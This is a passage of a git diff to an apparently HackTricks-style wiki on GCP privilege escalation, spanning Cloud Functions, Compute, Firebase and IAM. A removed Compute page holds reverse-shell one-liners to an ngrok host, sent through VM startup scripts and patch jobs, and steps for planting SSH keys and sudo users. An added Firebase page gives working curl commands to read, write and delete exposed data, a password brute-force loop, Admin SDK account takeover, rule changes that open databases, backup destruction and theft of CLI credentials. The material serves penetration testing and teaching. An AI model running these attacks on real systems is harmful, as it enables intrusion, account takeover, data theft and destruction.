- Not really sure how useful only this permission is from an attackers perspective, but good to know. ### `cloudfunctions.functions.setIamPolicy` , `iam.serviceAccounts.actAs` Give yourself any of the previous **`.update`** or **`.create`** privileges to escalate. +```bash +gcloud functions add-iam-policy-binding \ + --region= \ + --member="" \ + --role="roles/cloudfunctions.invoker" +``` + ### `cloudfunctions.functions.update` Only having **`cloudfunctions`** permissions, without **`iam.serviceAccounts.actAs`** you **won't be able to update the function SO THIS IS NOT A VALID PRIVESC.** +### Invoke functions +With the `cloudfunctions.functions.get`, `cloudfunctions.functions.invoke`, `run.jobs.run`, and run.routes.invoke permissions, an identity can directly invoke Cloud Functions. It is also necessary for the function to allow public traffic, or for the caller to be within the same network as the function itself. + +```bash +curl -X POST "https://" \ +-H "Authorization: bearer $(gcloud auth print-identity-token)" \ +-H "Content-Type: application/json" \ +-d '{ "name": "Developer" }' +``` + ### Read & Write Access over the bucket If you have read and write access over the bucket you can monitor changes in the code and whenever an **update in the bucket happens you can update the new code with your own code** that the new version of the Cloud Function will be run with the submitted backdoored code. diff --git a/src/pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-compute-privesc/README.md b/src/pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-compute-privesc/README.md deleted file mode 100644 index 104bae5a6e..0000000000 --- a/src/pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-compute-privesc/README.md +++ /dev/null @@ -1,151 +0,0 @@ -# GCP - Compute Privesc - -{{#include ../../../../banners/hacktricks-training.md}} - -## Compute - -For more information about Compute and VPC (netowork) in GCP check: - -{{#ref}} -../../gcp-services/gcp-compute-instances-enum/ -{{#endref}} - -> [!CAUTION] -> Note that to perform all the privilege escalation atacks that require to modify the metadata of the instance (like adding new users and SSH keys) it's **needed that you have `actAs` permissions over the SA attached to the instance**, even if the SA is already attached! - -### `compute.projects.setCommonInstanceMetadata` - -With that permission you can **modify** the **metadata** information of an **instance** and change the **authorized keys of a user**, or **create** a **new user with sudo** permissions. Therefore, you will be able to exec via SSH into any VM instance and steal the GCP Service Account the Instance is running with.\ -Limitations: - -- Note that GCP Service Accounts running in VM instances by default have a **very limited scope** -- You will need to be **able to contact the SSH** server to login - -For more information about how to exploit this permission check: - -{{#ref}} -gcp-add-custom-ssh-metadata.md -{{#endref}} - -You could aslo perform this attack by adding new startup-script and rebooting the instance: - -```bash -gcloud compute instances add-metadata my-vm-instance \ - --metadata startup-script='#!/bin/bash -bash -i >& /dev/tcp/0.tcp.eu.ngrok.io/18347 0>&1 &' - -gcloud compute instances reset my-vm-instance -``` - -### `compute.instances.setMetadata` - -This permission gives the **same privileges as the previous permission** but over a specific instances instead to a whole project. 
The **same exploits and limitations as for the previous section applies**. - -### `compute.instances.setIamPolicy` - -This kind of permission will allow you to **grant yourself a role with the previous permissions** and escalate privileges abusing them. Here is an example adding `roles/compute.admin` to a Service Account: - -```bash -export SERVER_SERVICE_ACCOUNT=YOUR_SA -export INSTANCE=YOUR_INSTANCE -export ZONE=YOUR_INSTANCE_ZONE - -cat < policy.json -bindings: -- members: - - serviceAccount:$SERVER_SERVICE_ACCOUNT - role: roles/compute.admin -version: 1 -EOF - -gcloud compute instances set-iam-policy $INSTANCE policy.json --zone=$ZONE -``` - -### **`compute.instances.osLogin`** - -If **OSLogin is enabled in the instance**, with this permission you can just run **`gcloud compute ssh [INSTANCE]`** and connect to the instance. You **won't have root privs** inside the instance. - -> [!TIP] -> In order to successfully login with this permission inside the VM instance, you need to have the `iam.serviceAccounts.actAs` permission over the SA atatched to the VM. - -### **`compute.instances.osAdminLogin`** - -If **OSLogin is enabled in the instanc**e, with this permission you can just run **`gcloud compute ssh [INSTANCE]`** and connect to the instance. You will have **root privs** inside the instance. - -> [!TIP] -> In order to successfully login with this permission inside the VM instance, you need to have the `iam.serviceAccounts.actAs` permission over the SA atatched to the VM. - -### `compute.instances.create`,`iam.serviceAccounts.actAs, compute.disks.create`, `compute.instances.create`, `compute.instances.setMetadata`, `compute.instances.setServiceAccount`, `compute.subnetworks.use`, `compute.subnetworks.useExternalIp` - -It's possible to **create a virtual machine with an assigned Service Account and steal the token** of the service account accessing the metadata to escalate privileges to it. - -The exploit script for this method can be found [here](https://github.com/RhinoSecurityLabs/GCP-IAM-Privilege-Escalation/blob/master/ExploitScripts/compute.instances.create.py). - -### `osconfig.patchDeployments.create` | `osconfig.patchJobs.exec` - -If you have the **`osconfig.patchDeployments.create`** or **`osconfig.patchJobs.exec`** permissions you can create a [**patch job or deployment**](https://blog.raphael.karger.is/articles/2022-08/GCP-OS-Patching). This will enable you to move laterally in the environment and gain code execution on all the compute instances within a project. - -Note that at the moment you **don't need `actAs` permission** over the SA attached to the instance. 
- -If you want to manually exploit this you will need to create either a [**patch job**](https://github.com/rek7/patchy/blob/main/pkg/engine/patches/patch_job.json) **or** [**deployment**](https://github.com/rek7/patchy/blob/main/pkg/engine/patches/patch_deployment.json)**.**\ -For a patch job run: - -```python -cat > /tmp/patch-job.sh <& /dev/tcp/0.tcp.eu.ngrok.io/18442 0>&1 -EOF - -gsutil cp /tmp/patch-job.sh gs://readable-bucket-by-sa-in-instance/patch-job.sh - -# Get the generation number -gsutil ls -a gs://readable-bucket-by-sa-in-instance - -gcloud --project=$PROJECT_ID compute os-config patch-jobs execute \ - --instance-filter-names=zones/us-central1-a/instances/ \ - --pre-patch-linux-executable=gs://readable-bucket-by-sa-in-instance/patch-job.sh# \ - --reboot-config=never \ - --display-name="Managed Security Update" \ - --duration=300s -``` - -To deploy a patch deployment: - -```bash -gcloud compute os-config patch-deployments create ... -``` - -The tool [patchy](https://github.com/rek7/patchy) could been used in the past for exploiting this misconfiguration (but now it's not working). - -**An attacker could also abuse this for persistence.** - -### `compute.machineImages.setIamPolicy` - -**Grant yourself extra permissions** to compute Image. - -### `compute.snapshots.setIamPolicy` - -**Grant yourself extra permissions** to a disk snapshot. - -### `compute.disks.setIamPolicy` - -**Grant yourself extra permissions** to a disk. - -### Bypass Access Scopes - -Following this link you find some [**ideas to try to bypass access scopes**](../index.html). - -### Local Privilege Escalation in GCP Compute instance - -{{#ref}} -../gcp-local-privilege-escalation-ssh-pivoting.md -{{#endref}} - -## References - -- [https://rhinosecuritylabs.com/gcp/privilege-escalation-google-cloud-platform-part-1/](https://rhinosecuritylabs.com/gcp/privilege-escalation-google-cloud-platform-part-1/) - -{{#include ../../../../banners/hacktricks-training.md}} - - - diff --git a/src/pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-compute-privesc/gcp-add-custom-ssh-metadata.md b/src/pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-compute-privesc/gcp-add-custom-ssh-metadata.md deleted file mode 100644 index a68e756b51..0000000000 --- a/src/pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-compute-privesc/gcp-add-custom-ssh-metadata.md +++ /dev/null @@ -1,100 +0,0 @@ -# GCP - Add Custom SSH Metadata - -{{#include ../../../../banners/hacktricks-training.md}} - -## Modifying the metadata - -Metadata modification on an instance could lead to **significant security risks if an attacker gains the necessary permissions**. - -### **Incorporation of SSH Keys into Custom Metadata** - -On GCP, **Linux systems** often execute scripts from the [Python Linux Guest Environment for Google Compute Engine](https://github.com/GoogleCloudPlatform/compute-image-packages/tree/master/packages/python-google-compute-engine#accounts). A critical component of this is the [accounts daemon](https://github.com/GoogleCloudPlatform/compute-image-packages/tree/master/packages/python-google-compute-engine#accounts), which is designed to **regularly check** the instance metadata endpoint for **updates to the authorized SSH public keys**. - -Therefore, if an attacker can modify custom metadata, he could make the the daemon find a new public key, which will processed and **integrated into the local system**. 
The key will be added into `~/.ssh/authorized_keys` file of an **existing user or potentially creating a new user with `sudo` privileges**, depending on the key's format. And the attacker will be able to compromise the host. - -### **Add SSH key to existing privileged user** - -1. **Examine Existing SSH Keys on the Instance:** - - - Execute the command to describe the instance and its metadata to locate existing SSH keys. The relevant section in the output will be under `metadata`, specifically the `ssh-keys` key. - - ```bash - gcloud compute instances describe [INSTANCE] --zone [ZONE] - ``` - - - Pay attention to the format of the SSH keys: the username precedes the key, separated by a colon. - -2. **Prepare a Text File for SSH Key Metadata:** - - Save the details of usernames and their corresponding SSH keys into a text file named `meta.txt`. This is essential for preserving the existing keys while adding new ones. -3. **Generate a New SSH Key for the Target User (`alice` in this example):** - - - Use the `ssh-keygen` command to generate a new SSH key, ensuring that the comment field (`-C`) matches the target username. - - ```bash - ssh-keygen -t rsa -C "alice" -f ./key -P "" && cat ./key.pub - ``` - - - Add the new public key to `meta.txt`, mimicking the format found in the instance's metadata. - -4. **Update the Instance's SSH Key Metadata:** - - - Apply the updated SSH key metadata to the instance using the `gcloud compute instances add-metadata` command. - - ```bash - gcloud compute instances add-metadata [INSTANCE] --metadata-from-file ssh-keys=meta.txt - ``` - -5. **Access the Instance Using the New SSH Key:** - - - Connect to the instance with SSH using the new key, accessing the shell in the context of the target user (`alice` in this example). - - ```bash - ssh -i ./key alice@localhost - sudo id - ``` - -### **Create a new privileged user and add a SSH key** - -If no interesting user is found, it's possible to create a new one which will be given `sudo` privileges: - -```bash -# define the new account username -NEWUSER="definitelynotahacker" - -# create a key -ssh-keygen -t rsa -C "$NEWUSER" -f ./key -P "" - -# create the input meta file -NEWKEY="$(cat ./key.pub)" -echo "$NEWUSER:$NEWKEY" > ./meta.txt - -# update the instance metadata -gcloud compute instances add-metadata [INSTANCE_NAME] --metadata-from-file ssh-keys=meta.txt - -# ssh to the new account -ssh -i ./key "$NEWUSER"@localhost -``` - -### SSH keys at project level - -It's possible to broaden the reach of SSH access to multiple Virtual Machines (VMs) in a cloud environment by **applying SSH keys at the project level**. This approach allows SSH access to any instance within the project that hasn't explicitly blocked project-wide SSH keys. Here's a summarized guide: - -1. **Apply SSH Keys at the Project Level:** - - - Use the `gcloud compute project-info add-metadata` command to add SSH keys from `meta.txt` to the project's metadata. This action ensures that the SSH keys are recognized across all VMs in the project, unless a VM has the "Block project-wide SSH keys" option enabled. - - ```bash - gcloud compute project-info add-metadata --metadata-from-file ssh-keys=meta.txt - ``` - -2. **SSH into Instances Using Project-Wide Keys:** - - With project-wide SSH keys in place, you can SSH into any instance within the project. Instances that do not block project-wide keys will accept the SSH key, granting access. - - A direct method to SSH into an instance is using the `gcloud compute ssh [INSTANCE]` command. 
This command uses your current username and the SSH keys set at the project level to attempt access. - -## References - -- [https://about.gitlab.com/blog/2020/02/12/plundering-gcp-escalating-privileges-in-google-cloud-platform/](https://about.gitlab.com/blog/2020/02/12/plundering-gcp-escalating-privileges-in-google-cloud-platform/) - -{{#include ../../../../banners/hacktricks-training.md}} - - diff --git a/src/pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-firebase-privesc.md b/src/pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-firebase-privesc.md new file mode 100644 index 0000000000..2f80a58da3 --- /dev/null +++ b/src/pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-firebase-privesc.md @@ -0,0 +1,474 @@ +# GCP - Firebase Privesc + +{{#include ../../../banners/hacktricks-training.md}} + +## Firebase + +### Unauthenticated access to Firebase Realtime Database +An attacker does not need any specific Firebase permissions to carry out this attack. It only requires that there is a vulnerable configuration in the Firebase Realtime Database security rules, where the rules are set with `.read: true` or `.write: true`, allowing public read or write access. + +The attacker must identify the database URL, which typically follows the format: `https://.firebaseio.com/`. + +This URL can be found through mobile application reverse engineering (decompiling Android APKs or analyzing iOS apps), analyzing configuration files such as google-services.json (Android) or GoogleService-Info.plist (iOS), inspecting the source code of web applications, or examining network traffic to identify requests to `*.firebaseio.com` domains. + +The attacker identifies the database URL and checks whether it is publicly exposed, then accesses the data and potentially writes malicious information. + +First, they check whether the database allows read access by appending .json to the URL. + +```bash +curl https://-default-rtdb.firebaseio.com/.json +``` + +If the response contains JSON data or null (instead of "Permission Denied"), the database allows read access. To check write access, the attacker can attempt to send a test write request using the Firebase REST API. +```bash +curl -X PUT https://-default-rtdb.firebaseio.com/test.json -d '{"test": "data"}' +``` +If the operation succeeds, the database also allows write access. + + +### Exposure of data in Cloud Firestore +An attacker does not need any specific Firebase permissions to carry out this attack. It only requires that there is a vulnerable configuration in the Cloud Firestore security rules where the rules allow read or write access without authentication or with insufficient validation. An example of a misconfigured rule that grants full access is: +```bash +service cloud.firestore { + match /databases/{database}/documents/{document=**} { + allow read, write: if true; + } +} +``` +This rule allows anyone to read and write all documents without any restrictions. Firestore rules are granular and apply per collection and document, so an error in a specific rule may expose only certain collections. + +The attacker must identify the Firebase Project ID, which can be found through mobile app reverse engineering, analysis of configuration files such as google-services.json or GoogleService-Info.plist, inspecting the source code of web applications, or analyzing network traffic to identify requests to firestore.googleapis.com. 
+The Firestore REST API uses the format: +```bash +https://firestore.googleapis.com/v1/projects//databases/(default)/documents// +``` + +If the rules allow unauthenticated read access, the attacker can read collections and documents. First, they attempt to access a specific collection: + +```bash +curl https://firestore.googleapis.com/v1/projects//databases/(default)/documents/ +``` + +If the response contains JSON documents instead of a permission error, the collection is exposed. The attacker can enumerate all accessible collections by trying common names or analyzing the structure of the application. To access a specific document: +```bash +curl https://firestore.googleapis.com/v1/projects//databases/(default)/documents// +``` + +If the rules allow unauthenticated write access or have insufficient validation, the attacker can create new documents: +```bash +curl -X POST https://firestore.googleapis.com/v1/projects//databases/(default)/documents/ \ + -H "Content-Type: application/json" \ + -d '{ + "fields": { + "name": {"stringValue": "Test"}, + "email": {"stringValue": "test@example.com"} + } + }' +``` + +Para modificar un documento existente se debe utilizar PATCH: +```bash +curl -X PATCH https://firestore.googleapis.com/v1/projects//databases/(default)/documents/users/ \ + -H "Content-Type: application/json" \ + -d '{ + "fields": { + "role": {"stringValue": "admin"} + } + }' +``` +Para eliminar un documento y causar denegación de servicio: +```bash +curl -X DELETE https://firestore.googleapis.com/v1/projects//databases/(default)/documents// +``` + + +### Exposure of files in Firebase Storage +An attacker does not need any specific Firebase permissions to carry out this attack. It only requires that there is a vulnerable configuration in the Firebase Storage security rules where the rules allow read or write access without authentication or with insufficient validation. Storage rules control read and write permissions independently, so an error in a rule may expose read access only, write access only, or both. An example of a misconfigured rule that grants full access is: +```bash +service cloud.firestore { + match /databases/{database}/documents/{document=**} { + allow read, write: if true; + } +} +``` +This rule allows read and write access to all documents without any restrictions. Firestore rules are granular and are applied per collection and per document, so an error in a specific rule may expose only certain collections. The attacker must identify the Firebase Project ID, which can be found through mobile application reverse engineering, analysis of configuration files such as google-services.json or GoogleService-Info.plist, inspection of web application source code, or network traffic analysis to identify requests to firestore.googleapis.com. +The Firestore REST API uses the format:`https://firestore.googleapis.com/v1/projects//databases/(default)/documents//.` + +If the rules allow unauthenticated read access, the attacker can read collections and documents. First, they attempt to access a specific collection. +```bash +curl "https://firebasestorage.googleapis.com/v0/b//o" +curl "https://firebasestorage.googleapis.com/v0/b//o?prefix=" +``` +If the response contains the list of files instead of a permission error, the file is exposed. 
The attacker can view the contents of the files by specifying their path: +```bash +curl "https://firebasestorage.googleapis.com/v0/b//o/" +``` + +If the rules allow unauthenticated write access or have insufficient validation, the attacker can upload malicious files. To upload a file through the REST API: +```bash +curl -X POST "https://firebasestorage.googleapis.com/v0/b//o?name=" \ + -H "Content-Type: " \ + --data-binary @ +``` +The attacker can upload code shells, malware payloads, or large files to cause a denial of service. If the application processes or executes uploaded files, the attacker may achieve remote code execution. To delete files and cause a denial of service: +```bash +curl -X DELETE "https://firebasestorage.googleapis.com/v0/b//o/" +``` + + +### Invocation of public Firebase Cloud Functions +An attacker does not need any specific Firebase permissions to exploit this issue; it only requires that a Cloud Function is publicly accessible over HTTP without authentication. + +A function is vulnerable when it is insecurely configured: + +- It uses functions.https.onRequest, which does not enforce authentication (unlike onCall functions). +- The function’s code does not validate user authentication (e.g., no checks for request.auth or context.auth). +- The function is publicly accessible in IAM, meaning allUsers has the roles/cloudfunctions.invoker role. This is the default behavior for HTTP functions unless the developer restricts access. + +Firebase HTTP Cloud Functions are exposed through URLs such as: + +- https://-.cloudfunctions.net/ +- https://.web.app/ (when integrated with Firebase Hosting) + +An attacker can discover these URLs through source code analysis, network traffic inspection, enumeration tools, or mobile app reverse engineering. +If the function is publicly exposed and unauthenticated, the attacker can invoke it directly without credentials. + +```bash +# Invoke public HTTP function with GET +curl "https://-.cloudfunctions.net/" +# Invoke public HTTP function with POST and data +curl -X POST "https://-.cloudfunctions.net/" \ + -H "Content-Type: application/json" \ + -d '{"param1": "value1", "param2": "value2"}' +``` +If the function does not properly validate inputs, the attacker may attempt other attacks such as code injection or command injection. + + +### Brute-force attack against Firebase Authentication with a weak password policy +An attacker does not need any specific Firebase permissions to carry out this attack. It only requires that the Firebase API Key is exposed in mobile or web applications, and that the password policy has not been configured with stricter requirements than the defaults. + +The attacker must identify the Firebase API Key, which can be found through mobile app reverse engineering, analysis of configuration files such as google-services.json or GoogleService-Info.plist, inspecting the source code of web applications (e.g., in bootstrap.js), or analyzing network traffic. + +Firebase Authentication’s REST API uses the endpoint: +`https://identitytoolkit.googleapis.com/v1/accounts:signInWithPassword?key=` +to authenticate with email and password. + +If Email Enumeration Protection is disabled, API error responses can reveal whether an email exists in the system (EMAIL_NOT_FOUND vs. INVALID_PASSWORD), which allows attackers to enumerate users before attempting password guessing. When this protection is enabled, the API returns the same error message for both nonexistent emails and incorrect passwords, preventing user enumeration. 
+
+It is important to note that Firebase Authentication enforces rate limiting, which can block requests if too many authentication attempts occur in a short time. Because of this, an attacker would have to introduce delays between attempts to avoid being rate-limited.
+
+The attacker identifies the API Key and performs authentication attempts with multiple passwords against known accounts. If Email Enumeration Protection is disabled, the attacker can enumerate existing users by analyzing the error responses:
+```bash
+# Attempt authentication with a known email and an incorrect password
+curl -X POST "https://identitytoolkit.googleapis.com/v1/accounts:signInWithPassword?key=" \
+  -H "Content-Type: application/json" \
+  -d '{
+    "email": "usuario@example.com",
+    "password": "password",
+    "returnSecureToken": true
+  }'
+```
+
+If the response contains EMAIL_NOT_FOUND, the email does not exist in the system. If it contains INVALID_PASSWORD, the email exists but the password is incorrect, confirming that the user is registered. Once a valid user is identified, the attacker can perform brute-force attempts. It is important to include pauses between attempts to avoid Firebase Authentication’s rate-limiting mechanisms:
+```bash
+counter=1
+for password in $(cat wordlist.txt); do
+  echo "Attempt $counter: trying password '$password'"
+  response=$(curl -s -X POST "https://identitytoolkit.googleapis.com/v1/accounts:signInWithPassword?key=" \
+    -H "Content-Type: application/json" \
+    -d "{\"email\":\"usuario@example.com\",\"password\":\"$password\",\"returnSecureToken\":true}")
+
+  if echo "$response" | grep -q "idToken"; then
+    echo "Password found: $password (attempt $counter)"
+    break
+  fi
+
+  # Pause to avoid rate limiting
+  sleep 1
+  counter=$((counter + 1))
+done
+```
+With the default password policy (minimum 6 characters, no complexity requirements), the attacker can try all possible combinations of 6-character passwords, which represents a relatively small search space compared to stricter password policies.
+
+### User management in Firebase Authentication
+
+The attacker needs specific Firebase Authentication permissions to carry out this attack. The required permissions are:
+
+- `firebaseauth.users.create` to create users
+- `firebaseauth.users.update` to modify existing users
+- `firebaseauth.users.delete` to delete users
+- `firebaseauth.users.get` to retrieve user information
+- `firebaseauth.users.sendEmail` to send emails to users
+- `firebaseauth.users.createSession` to create user sessions
+
+These permissions are included in the `roles/firebaseauth.admin` role, which grants full read/write access to Firebase Authentication resources. They are also included in higher-level roles such as `roles/firebase.developAdmin` (which includes all firebaseauth.* permissions) and `roles/firebase.admin` (full access to all Firebase services).
+
+To use the Firebase Admin SDK, the attacker would need access to service account credentials (JSON file), which might be found on compromised systems, publicly exposed code repositories, compromised CI/CD systems, or through the compromise of developer accounts that have access to these credentials.
+
+The first step is to configure the Firebase Admin SDK using service account credentials.
+
+```python
+import firebase_admin
+from firebase_admin import credentials, auth
+cred = credentials.Certificate('path/to/serviceAccountKey.json')
+firebase_admin.initialize_app(cred)
+```
+To create a malicious user using a victim’s email, the attacker would attempt to use the Firebase Admin SDK to generate a new account under that email.
+```python
+user = auth.create_user(
+    email='victima@example.com',
+    email_verified=False,
+    password='password123',
+    display_name='Malicious User',
+    disabled=False
+)
+print(f'User created: {user.uid}')
+```
+To modify an existing user, the attacker would update fields such as the email address, verification status, or whether the account is disabled.
+```python
+user = auth.update_user(
+    uid,
+    email='nuevo-email@example.com',
+    email_verified=True,
+    disabled=False
+)
+print(f'User updated: {user.uid}')
+```
+To delete a user account and cause a denial of service, the attacker would issue a request to remove the user entirely.
+```python
+auth.delete_user(uid)
+print('User deleted successfully')
+```
+The attacker can also retrieve information about existing users by requesting their UID or email address.
+```python
+user = auth.get_user(uid)
+print(f'User info: {user.uid}, {user.email}')
+user = auth.get_user_by_email('usuario@example.com')
+print(f'User info: {user.uid}, {user.email}')
+```
+Additionally, the attacker could generate verification links or password-reset links in order to change a user’s password and gain access to their account.
+```python
+link = auth.generate_email_verification_link(email)
+print(f'Verification link: {link}')
+link = auth.generate_password_reset_link(email)
+print(f'Password reset link: {link}')
+```
+
+### Modification of security rules in Firebase services
+The attacker needs specific permissions to modify security rules depending on the service. For Cloud Firestore and Firebase Cloud Storage, the required permissions are `firebaserules.rulesets.create` to create rulesets and `firebaserules.releases.create` to deploy releases. These permissions are included in the `roles/firebaserules.admin` role or in higher-level roles such as `roles/firebase.developAdmin` and `roles/firebase.admin`. For Firebase Realtime Database, the required permission is `firebasedatabase.instances.update`.
+
+The attacker must use the Firebase REST API to modify the security rules.
+First, the attacker would need to obtain an access token using service account credentials.
+To obtain the token:
+```bash
+gcloud auth activate-service-account --key-file=path/to/serviceAccountKey.json
+ACCESS_TOKEN=$(gcloud auth print-access-token)
+```
+
+To modify Firebase Realtime Database rules:
+```bash
+curl -X PUT "https://-default-rtdb.firebaseio.com/.settings/rules.json?access_token=$ACCESS_TOKEN" \
+  -H "Content-Type: application/json" \
+  -d '{
+    "rules": {
+      ".read": true,
+      ".write": true
+    }
+  }'
+```
+To modify Cloud Firestore rules, the attacker must create a ruleset and then deploy it:
+```bash
+curl -X POST "https://firebaserules.googleapis.com/v1/projects//rulesets" \
+  -H "Authorization: Bearer $ACCESS_TOKEN" \
+  -H "Content-Type: application/json" \
+  -d '{
+    "source": {
+      "files": [{
+        "name": "firestore.rules",
+        "content": "rules_version = '\''2'\'';\nservice cloud.firestore {\n  match /databases/{database}/documents {\n    match /{document=**} {\n      allow read, write: if true;\n    }\n  }\n}"
+      }]
+    }
+  }'
+```
+The previous command returns a ruleset name in the format projects//rulesets/.
To deploy the new version, the release must be updated using a PATCH request: +```bash +curl -X PATCH "https://firebaserules.googleapis.com/v1/projects//releases/cloud.firestore" \ + -H "Authorization: Bearer $ACCESS_TOKEN" \ + -H "Content-Type: application/json" \ + -d '{ + "release": { + "name": "projects//releases/cloud.firestore", + "rulesetName": "projects//rulesets/" + } + }' +``` +To modify Firebase Cloud Storage rules: +```bash +curl -X POST "https://firebaserules.googleapis.com/v1/projects//rulesets" \ + -H "Authorization: Bearer $ACCESS_TOKEN" \ + -H "Content-Type: application/json" \ + -d '{ + "source": { + "files": [{ + "name": "storage.rules", + "content": "service firebase.storage {\n match /b/{bucket}/o {\n match /{allPaths=**} {\n allow read, write: if true;\n }\n }\n}" + }] + } + }' +``` +The previous command returns a ruleset name in the format projects//rulesets/. To deploy the new version, the release must be updated using a PATCH request: +```bash +curl -X PATCH "https://firebaserules.googleapis.com/v1/projects//releases/firebase.storage/" \ + -H "Authorization: Bearer $ACCESS_TOKEN" \ + -H "Content-Type: application/json" \ + -d '{ + "release": { + "name": "projects//releases/firebase.storage/", + "rulesetName": "projects//rulesets/" + } + }' +``` + +### Data exfiltration and manipulation in Cloud Firestore +Cloud Firestore uses the same infrastructure and permission system as Cloud Datastore, so Datastore IAM permissions apply directly to Firestore. To manipulate TTL policies, the `datastore.indexes.update` permission is required. To export data, the `datastore.databases.export` permission is required. To import data, the datastore.databases.import permission is required. To perform bulk data deletion, the `datastore.databases.bulkDelete` permission is required. + +For backup and restore operations, specific permissions are needed: + +- `datastore.backups.get` and `datastore.backups.list` to list and retrieve details of available backups +- `datastore.backups.delete` to delete backups +- `datastore.backups.restoreDatabase` to restore a database from a backup +- `datastore.backupSchedules.create` and `datastore.backupSchedules.delete` to manage backup schedules + +When a TTL policy is created, a designated property is selected to identify entities that are eligible for deletion. This TTL property must be of the Date and time type. The attacker can choose a property that already exists or designate a property that they plan to add later. If the value of the field is a date in the past, the document becomes eligible for immediate deletion. The attacker can use the gcloud CLI to manipulate TTL policies. +```bash +# Enable TTL +gcloud firestore fields ttls update expireAt \ + --collection-group=users \ + --enable-ttl +# Disable TTL +gcloud firestore fields ttls update expireAt \ + --collection-group=users \ + --disable-ttl +``` +To export data and exfiltrate it, the attacker could use the gcloud CLI. +```bash +gcloud firestore export gs:// --project= --async --database='(default)' +``` + +To import malicious data: +```bash +gcloud firestore import gs:/// --project= --async --database='(default)' +``` + +To perform mass data deletion and cause a denial of service, the attacker could use the gcloud Firestore bulk-delete tool to remove entire collections. 
+```bash +gcloud firestore bulk-delete \ + --collection-ids=users,posts,messages \ + --database='(default)' \ + --project= +``` +For backup and restoration operations, the attacker could create scheduled backups to capture the current state of the database, list existing backups, restore from a backup to overwrite recent changes, delete backups to cause permanent data loss, and remove scheduled backups. +To create a daily backup schedule that immediately generates a backup: +```bash +gcloud firestore backups schedules create \ + --database='(default)' \ + --recurrence=daily \ + --retention=14w \ + --project= +``` +To restore from a specific backup, the attacker could create a new database using the data contained in that backup. The restore operation writes the backup’s data into a new database, meaning that an existing DATABASE_ID cannot be used. +```bash +gcloud firestore databases restore \ + --source-backup=projects//locations//backups/ \ + --destination-database='' \ + --project= +``` +To delete a backup and cause permanent data loss: +```bash +gcloud firestore backups delete \ + --backup= \ + --project= +``` + +### Theft and misuse of Firebase CLI credentials +An attacker does not need specific Firebase permissions to carry out this attack, but they do need access to the developer’s local system or to the Firebase CLI credentials file. These credentials are stored in a JSON file located at: + +- Linux/macOS: ~/.config/configstore/firebase-tools.json + +- Windows: C:\Users\[User]\.config\configstore\firebase-tools.json + +This file contains authentication tokens, including the refresh_token and access_token, which allow the attacker to authenticate as the user who originally ran firebase login. + +The attacker gains access to the Firebase CLI credentials file. They can then copy the entire file to their own system, and the Firebase CLI will automatically use the credentials from its default location. After doing so, the attacker can view all Firebase projects accessible to that user. +```bash +firebase projects:list +``` +## References + +- [https://rhinosecuritylabs.com/gcp/privilege-escalation-google-cloud-platform-part-1/](https://rhinosecuritylabs.com/gcp/privilege-escalation-google-cloud-platform-part-1/) + +{{#include ../../../banners/hacktricks-training.md}} + + + diff --git a/src/pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-iam-privesc.md b/src/pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-iam-privesc.md index 6e88dd06a4..4db52eda6c 100644 --- a/src/pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-iam-privesc.md +++ b/src/pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-iam-privesc.md @@ -14,45 +14,48 @@ Find more information about IAM in: An attacker with the mentioned permissions will be able to update a role assigned to you and give you extra permissions to other resources like: -
Update IAM role to add permissions - ```bash gcloud iam roles update --project --add-permissions ``` -
- You can find a script to automate the **creation, exploit and cleaning of a vuln environment here** and a python script to abuse this privilege [**here**](https://github.com/RhinoSecurityLabs/GCP-IAM-Privilege-Escalation/blob/master/ExploitScripts/iam.roles.update.py). For more information check the [**original research**](https://rhinosecuritylabs.com/gcp/privilege-escalation-google-cloud-platform-part-1/). +```bash +gcloud iam roles update --project --add-permissions +``` + +### `iam.roles.create` & `iam.serviceAccounts.setIamPolicy` +The iam.roles.create permission allows the creation of custom roles in a project/organization. In the hands of an attacker, this is dangerous because it enables them to define new sets of permissions that can later be assigned to entities (for example, using the iam.serviceAccounts.setIamPolicy permission) with the goal of escalating privileges. + +```bash +gcloud iam roles create \ + --project= \ + --title="" \ + --description="<Description>" \ + --permissions="permission1,permission2,permission3" +``` + ### `iam.serviceAccounts.getAccessToken` (`iam.serviceAccounts.get`) An attacker with the mentioned permissions will be able to **request an access token that belongs to a Service Account**, so it's possible to request an access token of a Service Account with more privileges than ours. -<details><summary>Impersonate service account to get access token</summary> - ```bash gcloud --impersonate-service-account="${victim}@${PROJECT_ID}.iam.gserviceaccount.com" \ auth print-access-token ``` -</details> - You can find a script to automate the [**creation, exploit and cleaning of a vuln environment here**](https://github.com/carlospolop/gcp_privesc_scripts/blob/main/tests/4-iam.serviceAccounts.getAccessToken.sh) and a python script to abuse this privilege [**here**](https://github.com/RhinoSecurityLabs/GCP-IAM-Privilege-Escalation/blob/master/ExploitScripts/iam.serviceAccounts.getAccessToken.py). For more information check the [**original research**](https://rhinosecuritylabs.com/gcp/privilege-escalation-google-cloud-platform-part-1/). ### `iam.serviceAccountKeys.create` An attacker with the mentioned permissions will be able to **create a user-managed key for a Service Account**, which will allow us to access GCP as that Service Account. -<details><summary>Create service account key and authenticate</summary> - ```bash gcloud iam service-accounts keys create --iam-account <name> /tmp/key.json gcloud auth activate-service-account --key-file=sa_cred.json ``` -</details> - You can find a script to automate the [**creation, exploit and cleaning of a vuln environment here**](https://github.com/carlospolop/gcp_privesc_scripts/blob/main/tests/3-iam.serviceAccountKeys.create.sh) and a python script to abuse this privilege [**here**](https://github.com/RhinoSecurityLabs/GCP-IAM-Privilege-Escalation/blob/master/ExploitScripts/iam.serviceAccountKeys.create.py). For more information check the [**original research**](https://rhinosecuritylabs.com/gcp/privilege-escalation-google-cloud-platform-part-1/). Note that **`iam.serviceAccountKeys.update` won't work to modify the key** of a SA because to do that the permissions `iam.serviceAccountKeys.create` is also needed. 
